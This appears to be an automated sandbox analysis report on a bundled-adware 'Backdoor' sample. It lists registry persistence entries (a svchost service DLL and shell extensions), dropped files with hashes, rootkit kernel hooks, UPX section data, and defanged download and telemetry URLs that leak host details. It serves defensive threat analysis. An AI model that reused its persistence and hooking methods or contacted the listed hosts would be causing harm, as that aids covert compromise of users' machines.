[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"

The process regsvr32.exe:2652 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 92 7B D7 48 F5 26 96 53 2B E8 FC E9 E3 DB E9"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"

[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"

[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

The process regsvr32.exe:1364 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 B4 37 16 32 B5 B3 0F 69 7D 8C 14 5F 1E 46 73"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "快压软件升级检查服务"

[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"

The process regsvr32.exe:800 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}]
"(Default)" = "KzShlobj Class"

[HKCR\KuaiZip.zip\shellex\DropHandler]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"

[HKCR\QZipShell.PropertyExt\CLSID]
"(Default)" = "{2FB831EA-DA68-4A66-8E31-A2D976A6296C}"

[HKCR\QZipShell.DragDropMenu\CLSID]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\QZipShell.KYDropHandler]
"(Default)" = "KYDropHandler Class"

[HKCR\QZipShell.ContextMenuExt.1]
"(Default)" = "ContextMenuExt Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"KuaiZip Shell Extension" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\ProgID]
"(Default)" = "QZipShell.KzShlobj.1"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\VersionIndependentProgID]
"(Default)" = "QZipShell.KYDropHandler"

[HKCR\QZipShell.ContextMenuExt]
"(Default)" = "ContextMenuExt Class"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}]
"(Default)" = "IKzShlobj"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\ProgID]
"(Default)" = "QZipShell.ContextMenuExt.1"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\QZipShell.KYDropHandler.1\CLSID]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"

[HKCR\QZipShell.DragDropMenu.1\CLSID]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\ProgID]
"(Default)" = "QZipShell.PropertyExt.1"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\ProgID]
"(Default)" = "QZipShell.DragDropMenu.1"

[HKCR\QZipShell.KYDropHandler\CurVer]
"(Default)" = "QZipShell.KYDropHandler.1"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\VersionIndependentProgID]
"(Default)" = "QZipShell.KzShlobj"

[HKCR\Directory\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\*\shellex\ContextMenuHandlers\ContextMenuExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Folder\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\Drive\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}]
"(Default)" = "DragDropMenu Class"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\QZipShell.DragDropMenu.1]
"(Default)" = "DragDropMenu Class"

[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0]
"(Default)" = "QZipShell 1.0 Type Library"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\ProgID]
"(Default)" = "QZipShell.KYDropHandler.1"

[HKCR\QZipShell.KzShlobj\CLSID]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}]
"(Default)" = "ContextMenuExt Class"

[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\QZipShell.DragDropMenu\CurVer]
"(Default)" = "QZipShell.DragDropMenu.1"

[HKCR\KuaiZip.kz\shellex\DropHandler]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"

[HKCR\QZipShell.DragDropMenu]
"(Default)" = "DragDropMenu Class"

[HKCR\AppID\{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}]
"(Default)" = "QZipShell"

[HKCR\QZipShell.ContextMenuExt.1\CLSID]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"

[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\HELPDIR]
"(Default)" = "%Program Files%\¿ìѹ\X86"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\KzShlobj]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"

[HKCR\QZipShell.PropertyExt.1\CLSID]
"(Default)" = "{2FB831EA-DA68-4A66-8E31-A2D976A6296C}"

[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\0\win32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"

[HKCR\QZipShell.ContextMenuExt\CLSID]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\QZipShell.ContextMenuExt\CurVer]
"(Default)" = "QZipShell.ContextMenuExt.1"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"

[HKCR\QZipShell.KYDropHandler\CLSID]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}]
"(Default)" = "KYDropHandler Class"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 46 74 DD 7B 6A F5 5C 95 E3 3A AE B4 AF 90 E2"

[HKCR\QZipShell.KzShlobj.1]
"(Default)" = "KzShlobj Class"

[HKCR\QZipShell.KYDropHandler.1]
"(Default)" = "KYDropHandler Class"

[HKCR\Directory\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\VersionIndependentProgID]
"(Default)" = "QZipShell.ContextMenuExt"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\VersionIndependentProgID]
"(Default)" = "QZipShell.DragDropMenu"

[HKCR\Drive\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"

[HKCR\QZipShell.KzShlobj.1\CLSID]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"

[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\QZipShell.KzShlobj\CurVer]
"(Default)" = "QZipShell.KzShlobj.1"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\VersionIndependentProgID]
"(Default)" = "QZipShell.PropertyExt"

[HKCR\QZipShell.KzShlobj]
"(Default)" = "KzShlobj Class"

[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\QZipShell.PropertyExt.1]
"(Default)" = "PropertyExt Class"

[HKCR\QZipShell.PropertyExt\CurVer]
"(Default)" = "QZipShell.PropertyExt.1"

[HKCR\QZipShell.PropertyExt]
"(Default)" = "PropertyExt Class"

[HKCR\*\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"

[HKCR\AppID\QZipShell.DLL]
"AppID" = "{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}"

[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}]
"(Default)" = "PropertyExt Class"

The process CheckerExe.exe:1644 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 00 57 9E 96 D0 C5 C6 E5 E5 38 17 D1 02 13 5D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process 9158chat2_ktv097_28.exe:2072 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"

[HKLM\SOFTWARE\9158web]
"StartTime" = "10140141"

[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\9158Service]
"LastPlat" = "51"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓƵ]
"DisplayVersion" = "6.930"
"DisplayName" = "9158¶àÈËÊÓƵ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158¶àÈËÊÓƵ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 AF 4A BC 0A E5 16 D7 D1 23 24 A0 AF 01 9C 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓƵ]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "Ìì¸ñ¿Æ¼¼£¨º¼ÖÝ£©ÓÐÏÞ¹«Ë¾"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓƵ]
"URLInfoAbout" = "http://www.9158.com/"

The process at.exe:1868 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 02 F8 05 37 B5 EC FF 91 F0 80 7B 72 18 E3 78"

The process at.exe:1880 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C F5 08 E6 50 A4 EE 3D 2B 43 24 51 FF 59 6D 2E"

Dropped PE files

MD5 File path
1722c85218f317e85adabe7a8968e45d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\J82PQLBK\ky[1]
26c9871fe8541e68df2b412884fdd3e4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\S66QYDZB\mm[1]
a3efe5dcf3ff68e767bcd7ca5cbf6da7 c:\Program Files\¿ìѹ\X86\7z.dll
f9df32bbcf0008b31b120adee0330cca c:\Program Files\¿ìѹ\X86\BSCoreNew.dll
c759446938a75f0d79a7394e95e0857f c:\Program Files\¿ìѹ\X86\DiskOpt.exe
5ea3ebce1c03bc93f949ebd716103c5f c:\Program Files\¿ìѹ\X86\DuiLib.dll
e145b90254155277867c2a1e4c5ea7b7 c:\Program Files\¿ìѹ\X86\KZFormat.dll
de5a079eb8232fb1ff0cb822e40dc0ed c:\Program Files\¿ìѹ\X86\KZModule.dll
3817793ec42db855d7380156902476dd c:\Program Files\¿ìѹ\X86\KZMount.exe
dc6230f76abdf333795366f327662e52 c:\Program Files\¿ìѹ\X86\KZReport.exe
fe5e9a739b28d52cc9ea97ab82ef58b2 c:\Program Files\¿ìѹ\X86\KZipShell.dll
8698491d0ba311d261ec812ca7506b3d c:\Program Files\¿ìѹ\X86\KuaiZip.exe
516bb0b1b1e009b62e1a2eab8157cfab c:\Program Files\¿ìѹ\X86\KuaiZipDrive.sys
5100fc924872301855af85ceb0d98c99 c:\Program Files\¿ìѹ\X86\Mount.dll
c853ae40fb0e9ed662862a9d627d9663 c:\Program Files\¿ìѹ\X86\MountCore.dll
210703170fa5ae6d3bb0bf080baa9be5 c:\Program Files\¿ìѹ\X86\SetupHelper.exe
ddcc2bd4cca38c3565bcd7cda7fa5dec c:\Program Files\¿ìѹ\X86\Uninst.exe
5b98ab9e81a819a979bee2ab2e1eb7b2 c:\Program Files\¿ìѹ\X86\Update.exe
b50c2268cf7432b1023db34dec561416 c:\Program Files\¿ìѹ\X86\finderlib.dll
b8fca8299e3031e13ea4d01a708b52ff c:\Program Files\¿ìѹ\X86\kuaizipUpdateChecker.dll
e6fc4d3d023e1ce949c8f6db15b5de36 c:\Program Files\¿ìѹ\X86\lang\Chs_Lang.dll
14757fb0abc92b96f00e20d663c553c5 c:\Program Files\¿ìѹ\X86\sfx\kzSetup_chs.sfx
516bb0b1b1e009b62e1a2eab8157cfab c:\WINDOWS\system32\drivers\KuaiZipDrive.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\DRIVERS\bd0001.sys" the Backdoor controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Backdoor controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Backdoor controls loading executable images into a memory by installing the Load image notifier.
The Backdoor installs the following kernel-mode hooks:

ZwUnloadKey

Propagation

VersionInfo

Company Name: Soft
Product Name: ?????
Product Version: 5.2.1.0
Legal Copyright: Soft ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.2.1.0
File Description: dc CAD
Comments: ????
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 2252800 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 2256896 532480 532480 5.46948 276b984491ac4d912b46291d96ddfb19
.rsrc 2789376 24576 24576 3.09822 001b173ba8ca5bdeefda647e026db3f3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://cnrdn.com/rd.htm?id=1384659&r=http://www.baidu.com/ 42.156.140.191
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1
hxxp://brdlsw.jomodns.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424
hxxp://stat.kpzip.com/stat/index.php?pcid=e06b40e4c7ee2608455420c2f88bfbce&app=kuaizip&ver=2.8.2.3&channel=7654_1061607&category=Kuaizip_Setup_7654_1061607.exe&act=app_install_start&p1=&p2=&key=f86cfb0bbad855f1a10c4fd2071a1816 180.150.186.16
hxxp://opt.ecoma.ourwebpic.com/n/install/tui/show_7654.txt
hxxp://stat.kpzip.com/stat/index.php?pcid=e06b40e4c7ee2608455420c2f88bfbce&app=kuaizip&ver=2.8.2.3&channel=7654_1061607&category=Update.exe&act=app_update_run&p1=&p2=&key=5a29521d4b9ed90e33fc5625167fd0db 180.150.186.16
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078
hxxp://cnrdn.com/rd.htm?id=1490574&r=http://www.baidu.com/ 42.156.140.191
hxxp://opt.ecoma.ourwebpic.com/Opendownloadernewxml.aspx?softlist=&lmarkid=97
hxxp://opt.ecoma.ourwebpic.com/n/report/report.txt
hxxp://stat.kpzip.com/stat/index.php?pcid=e06b40e4c7ee2608455420c2f88bfbce&app=kuaizip&ver=2.8.2.3&channel=7654_1061607&category=Update.exe&act=app_install_done&p1=&p2=&key=7952a2e8dadfb792f70878eadfb58a92 180.150.186.16
hxxp://opt.ecoma.ourwebpic.com/temp/downloaderico/main.ico
hxxp://tj.kpzip.com/kuaizipreport/install?code=NzY1NF8xMDYxNjA3MTUxMDE0CTJDRkU4N0JGNjgyNENGRDEyOTQ0MjhBQTc5NTBBQ0IxCUtaUmVwb3J0LmV4ZQlLdWFpWmlwCTIuOC4yLjMJMDAwMDAwMDAwMDAwMDAwMDAwMDEJMEZFQkZCRkYwMDAzMDZDMwkwMC0wQy0yOS04QS04Qi0zNwlNaWNyb3NvZnQgV2luZG93cyBYUA== 123.59.80.92
hxxp://cnrdn.com/rd.htm?id=1486675&r=http://www.baidu.com/ 42.156.140.191
hxxp://opt.ecoma.ourwebpic.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-8A-8B-37&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=97&Wmarkid=28&Mtype=19&tick=1444776090&flag=1535c21d33e8ce981555bdde9441bd26&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9
hxxp://opt.ecoma.ourwebpic.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-8A-8B-37&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=97&Wmarkid=28&Mtype=19&tick=1444776094&flag=d1166baaa7732532f9b63d7b1cd42fd4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9
hxxp://opt.ecoma.ourwebpic.com/Downloaderconfig.aspx?imgtype=9158
hxxp://ui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
hxxp://opt.ecoma.ourwebpic.com/temp/flash/1.swf
hxxp://1st.dl.ourdvs.com/ktv/9158chat2_ktv097_28140141.exe
hxxp://imgcache.qq.com.cdngc.net/ptlogin/v4/style/0/images/icons.gif 151.249.89.217
hxxp://imgcache.qq.com.cdngc.net/ptlogin/ver/10136/js/xui.js?v=10007 151.249.89.217
hxxp://imgcache.qq.com.cdngc.net/ptlogin/v4/style/0/images/load.gif 151.249.89.217
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f
hxxp://i.kpzip.com/n/install/tui/show_7654.txt 203.130.61.92
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 112.90.83.106
hxxp://imgcache.qq.com/ptlogin/ver/10136/js/xui.js?v=10007 151.249.89.217
hxxp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif 151.249.89.217
hxxp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158 203.130.61.92
hxxp://tj.9158.com/Opendownloadernewxml.aspx?softlist=&lmarkid=97 203.130.61.92
hxxp://tj.9158.com/temp/downloaderico/main.ico 203.130.61.92
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-8A-8B-37&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=97&Wmarkid=28&Mtype=19&tick=1444776094&flag=d1166baaa7732532f9b63d7b1cd42fd4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 203.130.61.92
hxxp://tj.9158.com/temp/flash/1.swf 203.130.61.92
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-8A-8B-37&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=97&Wmarkid=28&Mtype=19&tick=1444776090&flag=1535c21d33e8ce981555bdde9441bd26&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 203.130.61.92
hxxp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe 118.123.210.46
jh.01lm.com 113.17.140.156


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

